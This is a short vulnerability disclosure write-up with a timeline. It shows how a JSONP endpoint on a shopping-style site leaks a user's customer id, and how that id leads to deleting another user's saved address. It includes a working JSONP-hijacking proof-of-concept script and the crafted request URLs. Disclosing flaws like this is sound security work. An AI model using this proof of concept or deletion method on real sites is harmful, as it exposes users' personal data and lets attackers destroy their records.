Jsonp+Excessive deletion Vul

1、First I found the address of the website that leaked the user id.

jQuery111308705583230454748_1548063320659({"responseCode":"200","responseDesc":"success","responseData":{"cust":{"customerGuid":"df73d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"YongShao","gender":2,"country":"CN","countryName":"China","province":"CN-12","provinceName":"****","city":"CN-12-001","cityName":"****","telephone":"1***********","email":""}}})

Then I constructed the jsonp's poc to get the victim's id.

<script>function jQuery111308705583230454748_1548063320659(d) {alert(d['responseData']['cust']['customerGuid']);}</script><script type="text/javascript"src="https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getServiceCust/1000jsonp=jQuery111308705583230454748_1548063320659&accountId=&source=100000007&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&language=zh-cn&siteCode=zh_CN&_=1548063320660"></script>

got it

2、Then I found that I can use the id splicing to get the user address id.

https://yongshao.com/ccpcmd/services/dispatch/secured/CCPC/EN/ccpd/getContactList/1000?jsonp=jQuery111308705583230454748_1548063320661&source=100000007&customerGuid=df73d476-5f1d-e911-80ff-*******&language=zh-cn&channelCode=WEBSITE&countryCode=CN&langCode=zh-cn&country=CN&siteCode=zh_CN&_=1548063320667

response:

jQuery111308705583230454748_1548063320661({"responseData":{"list":[{"customerGuid":"df73d476-5f1d-e911-80ff-******","contactAddressId":"e973d476-5f1d-e911-80ff-******","language":"zh-cn","fullName":"tset","country":"CN","province":"CN-12","city":"CN-12-001","district":"CN-12-001-02","isDefault":"N","createdon":"2019-01-21 03:45:04","countryName":"China","provinceName":"*****","cityName":"*****","districtName":"***","telephone":"131********","postCode":"","address":"*****"}]},"responseCode":"200","responseDesc":"success"})

contactAddressId This parameter is the address

3、Try to use this information to delete on the B account

F12 find delete button

<a data-contactaddressid="e973d476-5f1d-e911-80ff-******" class="delete-btn under-line" href="javascript:;">Del</a>

Then return to the A account to confirm whether the deletion was successful. Observe through the jsonp interface

• TimeLine

2019.01.21 Report Vul

2019.01.22 Received a vulnerability and transferred processing

……（I don't know when it was fixed.）

2019.02.19 Published paper

本文始发于微信公众号（逢人斗智斗勇）：Jsonp+Excessive deletion Vul